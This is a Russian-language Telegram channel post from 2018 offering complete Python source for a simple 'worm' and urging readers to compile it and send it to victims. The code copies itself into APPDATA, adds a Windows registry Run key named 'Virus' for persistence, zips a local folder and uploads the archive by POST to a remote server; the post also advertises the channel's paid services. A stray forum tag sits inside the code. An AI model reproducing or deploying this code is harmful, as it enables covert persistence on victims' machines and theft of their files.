Join
0-day | Уязвимость 0-го дня
@0-day
October 10, 2018

Червь на Python

Всем доброго времени суток!

От делать не фиг, настрочил простенький червь на питоне, что бы он послужил вам примером/неким представлением "тёмной" области этого языка.

Добавим наш заражённый файл в какую-нибудь папку, где он не будет мозолить пользователю глаза, я долго думать не стал, т.к это всего лишь пример и добавил его в папку AppData.

Python:

directory = os.getenv("APPDATA") + r'/your_program/'
base_file = directory + os.path.basename(__file__)


if not os.path.exists(directory):
    os.makedirs(directory)
    shutil.copy(__file__, base_file)

Первым делом я решил закрепить наш файл в автозапуске операционной системе, делал я это через реестр.

Тут нам поможет модуль winreg.

Python:

path_to_reestr = OpenKey(HKEY_CURRENT_USER,
                        r'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
                        0, KEY_ALL_ACCESS)
SetValueEx(path_to_reestr, 'Virus', 0, REG_SZ, base_file)
CloseKey(path_to_reestr)

В переменной мы установили путь до реестра, дальше добавили значение нашего вируса,

лучше назвать его как-то неприметно, но я во все услышание ознаменовал его 'Virus'.

И устанавливаем путь до файла (base_file).

Ну и тупо в три строчки напишем тело нашего червя xD

Python:

# Добавляем папку в аврхив
shutil.make_archive(r'Имя архива', 'zip', r'Папка')

# Отправляем архив на сервер
files = {'Имя архива': open('Имя архива', 'rb')}
r = requests.post('http://httpbin.org/post', files=files)

Добавляем его в архив и отправляем его на сервер с помощью post запроса.

В итоге у нас должно получиться что-то наподобие этого

Весь скрипт 

import shutil
import os
import sys
import requests
from winreg import *


def autorun():
    # Путь, который будет светиться в авторане
    directory = os.getenv("APPDATA") + r'/your_program/'
    base_file = directory + os.path.basename(__file__)

    if not os.path.exists(directory):
        os.makedirs(directory)
        shutil.copy(__file__, base_file)

    # Путь в реестре
    path_to_reestr = OpenKey(HKEY_CURRENT_USER,
                     r'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
                     0, KEY_ALL_ACCESS)
    # Установить программу "Virus" в автозагрузку
    SetValueEx(path_to_reestr, 'Virus', 0, REG_SZ, base_file)
    # Закрыть реестр
    CloseKey(path_to_reestr)


def addToZip():
    # Добавляем папку в аврхив
    shutil.make_archive(r'C:\\file', 'zip', r'C:\xampp')[/SPOILER]

    # Отправляем архив на сервер
    files = {'file.zip': open('C:\\file.zip', 'rb')}
    r = requests.post('http://httpbin.org/post', files=files)

autorun()
addToZip()

Далее пакуем его в exe и идем кидать жертвам.

Наши услуги: @GOdayBot

Внимание!!! Вся Информация на канале "0-day | Уязвимость 0-го дня" для ознакомления, не несёт в себе призыва к чему-либо, автор не несёт никакой ответственности. 18
0-day | Уязвимость 0-го дня
October 10, 2018, 05:44
0 views
0 reactions